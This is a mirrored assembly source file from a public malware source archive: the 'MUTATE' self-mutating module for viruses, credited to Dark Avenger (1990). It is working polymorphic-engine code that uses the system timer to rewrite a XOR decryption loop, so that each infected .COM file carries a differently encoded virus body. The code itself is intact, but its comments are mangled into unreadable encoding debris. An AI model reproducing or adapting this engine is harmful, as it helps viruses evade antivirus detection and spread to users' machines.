mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
188 lines
3.2 KiB
NASM
188 lines
3.2 KiB
NASM
|
page ,132
|
|||
|
name mutate
|
|||
|
title MUTATE - A Self-mutating Module for Viruses
|
|||
|
.radix 16
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
|
|||
|
; This source code is a copyrighted material
|
|||
|
; (C) 1990 DARK AVENGER
|
|||
|
|
|||
|
org 100
|
|||
|
|
|||
|
timer equ 46C
|
|||
|
|
|||
|
start:
|
|||
|
jmp prog
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> v_entry.
|
|||
|
; <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> JMP-a, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> 100, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> .COM <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
|
|||
|
v_entry:
|
|||
|
xchg ax,bp
|
|||
|
mov si,100
|
|||
|
inc si
|
|||
|
add si,[si]
|
|||
|
mov di,si
|
|||
|
xor dx,dx
|
|||
|
mov cx,(top-encrypt)/2-1
|
|||
|
push cx
|
|||
|
calcgen:
|
|||
|
xor dx,[si+encrypt-v_entry+2]
|
|||
|
org $-1
|
|||
|
inc si
|
|||
|
inc si
|
|||
|
dec cx
|
|||
|
jns calcgen
|
|||
|
pop ax
|
|||
|
decrypt:
|
|||
|
xor [di+encrypt-v_entry+2],dx
|
|||
|
org $-1
|
|||
|
inc di
|
|||
|
inc di
|
|||
|
dec ax
|
|||
|
jns decrypt
|
|||
|
encrypt:
|
|||
|
xchg si,si ;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
xchg dx,dx
|
|||
|
add si,encrypt-top+2
|
|||
|
dec dx
|
|||
|
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
; DX = -<2D><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; SI = <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> v_entry.
|
|||
|
|
|||
|
; . . .
|
|||
|
prog:
|
|||
|
push ds
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:[timer]
|
|||
|
pop ds
|
|||
|
call mutate
|
|||
|
mov ax,4C00
|
|||
|
int 21
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
; AX = <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><> 0:46C)
|
|||
|
|
|||
|
mutate:
|
|||
|
cld
|
|||
|
xor dx,dx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov cx,90
|
|||
|
div cx
|
|||
|
call getcode
|
|||
|
mov ds:[15],al
|
|||
|
call getcode
|
|||
|
mov ds:[1E],al
|
|||
|
xchg ax,dx
|
|||
|
mov dl,6
|
|||
|
div dl
|
|||
|
mov si,offset muttbl
|
|||
|
mov bx,offset xlatbl1
|
|||
|
call buildblk
|
|||
|
mov [si],al
|
|||
|
inc si
|
|||
|
mov bx,offset xlatbl2
|
|||
|
call buildblk2
|
|||
|
mov bx,offset xlatbl3
|
|||
|
call buildblk2
|
|||
|
mov bx,offset muttbl-1
|
|||
|
mov si,offset xlatdat
|
|||
|
mov cx,xlatbl1-xlatdat
|
|||
|
nextgen:
|
|||
|
lodsb
|
|||
|
test al,al
|
|||
|
jz cantchg
|
|||
|
push ax
|
|||
|
and al,111b
|
|||
|
xlat
|
|||
|
mov ah,0F8
|
|||
|
xchg ax,dx
|
|||
|
pop ax
|
|||
|
push cx
|
|||
|
mov cl,3
|
|||
|
shr al,cl
|
|||
|
jz skipxlat
|
|||
|
xlat
|
|||
|
shl al,cl
|
|||
|
jz skipxlat
|
|||
|
xlat
|
|||
|
shl al,cl
|
|||
|
or dl,al
|
|||
|
mov dh,0c0
|
|||
|
skipxlat:
|
|||
|
pop cx
|
|||
|
and [si-(xlatdat+1-v_entry)],dh
|
|||
|
or [si-(xlatdat+1-v_entry)],dl
|
|||
|
cantchg:
|
|||
|
loop nextgen
|
|||
|
ret
|
|||
|
|
|||
|
buildblk2:
|
|||
|
mov al,ah
|
|||
|
buildblk:
|
|||
|
shr al,1
|
|||
|
mov dl,al
|
|||
|
push ax
|
|||
|
adc al,1
|
|||
|
cmp al,3
|
|||
|
jb setblk
|
|||
|
sub al,3
|
|||
|
setblk:
|
|||
|
or dl,al
|
|||
|
xlat
|
|||
|
mov [si],al
|
|||
|
inc si
|
|||
|
pop ax
|
|||
|
xlat
|
|||
|
mov [si],al
|
|||
|
inc si
|
|||
|
mov al,dl
|
|||
|
xor al,3
|
|||
|
xlat
|
|||
|
ret
|
|||
|
|
|||
|
getcode:
|
|||
|
shr dx,1
|
|||
|
mov al,79
|
|||
|
jnc got
|
|||
|
or al,100b
|
|||
|
got:
|
|||
|
ret
|
|||
|
|
|||
|
xlatdat db 0,4,0,0,4,0,26,0
|
|||
|
db 2c,0,9,2,0,0,2,0
|
|||
|
db 0e,0,4,4,2,0,0,3
|
|||
|
db 0,0f,0,5,5,3,0,0
|
|||
|
db 0,4,0,1
|
|||
|
|
|||
|
xlatbl1 db 0,1,2
|
|||
|
xlatbl2 db 3,6,7
|
|||
|
xlatbl3 db 7,4,5
|
|||
|
|
|||
|
chksum dw 1A03 ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>. <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><> <20>XOR-<2D><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 16-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> encrypt <20> top. <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> chksum <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> errnz <20> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; encrypt <20> top <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>.
|
|||
|
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; . . .
|
|||
|
|
|||
|
top:
|
|||
|
.errnz (encrypt-v_entry) mod 2
|
|||
|
.errnz (top-encrypt) mod 4-2
|
|||
|
.errnz (top-v_entry) mod 2
|
|||
|
.errnz (chksum-v_entry) mod 2
|
|||
|
|
|||
|
muttbl db 7 dup(?) ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> mutate
|
|||
|
|
|||
|
end start
|
|||
|
|